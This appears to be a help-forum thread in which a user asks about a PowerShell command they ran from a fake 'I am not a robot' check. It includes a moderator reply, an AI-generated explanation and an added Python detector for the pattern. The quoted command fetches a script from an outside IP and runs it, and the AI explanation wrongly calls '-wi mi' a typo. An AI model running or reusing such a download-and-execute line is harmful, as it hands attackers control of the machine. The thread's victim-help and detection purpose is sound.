You're lucky in that the final payload (Ellaism.msi) for the chain of scripts has been taken down.
I stupidly ran this powershell prompt
I stupidly ran this CMD command and have no idea what it may have done.
powershell -wi mi -EP B -c iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt)
Can someone tell me what exactly this command means? As it says towards the end, I thought I was passing a not a robot link.
Many Thanks
CrazyKats 14,805 Reputation points Volunteer Moderator 2026-02-22T18:23:39.8233333+00:00
Hi JDZ,
Did running that command show that it did anything? If it did, I would System Restore to before you ran the command, if you created a restore point.
Q&A Assist 2026-02-22T18:12:57.0866667+00:00
AI generated content. This question contains an answer created with AI from Q&A Assist.
The command you ran is a PowerShell command that executes a script from a remote server. Let's break it down:
- powershell: This invokes the PowerShell environment.
- -wi mi: This part is not standard and seems to be a typo or misconfiguration. It might be intended to set some parameters, but it’s unclear without context.
- -EP B: This sets the execution policy to Bypass, which allows scripts to run without restrictions. This is often used to run potentially harmful scripts without warning.
- -c: This indicates that the following string is a command to execute.
- iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt): This is the core of the command:
  - iex: This is an alias for Invoke-Expression, which executes the string as a command.
  - irm: This is an alias for Invoke-RestMethod, which retrieves content from the specified URL.
  - 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt: This is the URL from which the content is being fetched. The content from this URL is then executed as a PowerShell command.
In summary, this command fetches a script from a remote server and executes it. This can be very dangerous, as it could potentially run malicious code on your system. If you are concerned about security, it is advisable to run a full antivirus scan and monitor your system for any unusual activity.
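For defenders reviewing process-creation logs, the following added example (not part of the question or of either answer) expands abbreviated powershell.exe switches and flags the download-and-execute pattern seen in the command from the question. The parameter table is a simplified model of the prefix matching powershell.exe accepts and is an assumption of this example, as are the function names; under it, -wi mi resolves to -WindowStyle Minimized.

```python
import re

# Simplified model (assumption of this example): (full name, shortest accepted
# prefix), checked in order; powershell.exe accepts longer prefixes as well.
PARAMS = [("windowstyle", "w"), ("executionpolicy", "ex"), ("encodedcommand", "e"),
          ("command", "c"), ("noprofile", "nop"), ("noninteractive", "noni")]
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
VALUES = {
    "windowstyle": ["normal", "minimized", "maximized", "hidden"],
    "executionpolicy": ["bypass", "unrestricted", "remotesigned", "allsigned", "restricted"],
}
# Invoke-Expression (iex) applied to the result of a web request (irm / iwr)
CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
# The command exactly as quoted in the question (address already redacted there)
SAMPLE = "powershell -wi mi -EP B -c iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt)"

def expand_param(key):
    """Map an abbreviated switch such as 'wi' or 'EP' to its full name, or None."""
    key = key.lower()
    if key in ALIASES:
        return ALIASES[key]
    for full, shortest in PARAMS:
        if full.startswith(key) and len(key) >= len(shortest):
            return full
    return None

def expand_value(param, value):
    """Expand an unambiguous value prefix ('mi' -> 'minimized'); else return it unchanged."""
    hits = [v for v in VALUES.get(param, []) if v.startswith(value.lower())]
    return hits[0] if len(hits) == 1 else value

def analyze(cmdline):
    """Return (expanded switches, findings) for one logged command line."""
    tokens, params, i = cmdline.split(), {}, 1  # tokens[0] is the executable
    while i < len(tokens) and tokens[i][0] in "-/":
        name = expand_param(tokens[i][1:])
        if name is None or name == "command":
            break  # everything after -Command is script text, not switches
        takes_value = name in VALUES and i + 1 < len(tokens)
        params[name] = expand_value(name, tokens[i + 1]) if takes_value else True
        i += 2 if takes_value else 1
    findings = []
    if params.get("windowstyle") in ("minimized", "hidden"):
        findings.append("window suppressed")
    if params.get("executionpolicy") in ("bypass", "unrestricted"):
        findings.append("execution policy relaxed")
    if CRADLE.search(cmdline):
        findings.append("remote content passed to Invoke-Expression")
    return params, findings
```

Calling analyze(SAMPLE) returns the expanded switches together with all three findings; a hit on the third finding alone is usually enough to warrant pulling the process tree and network logs for that host.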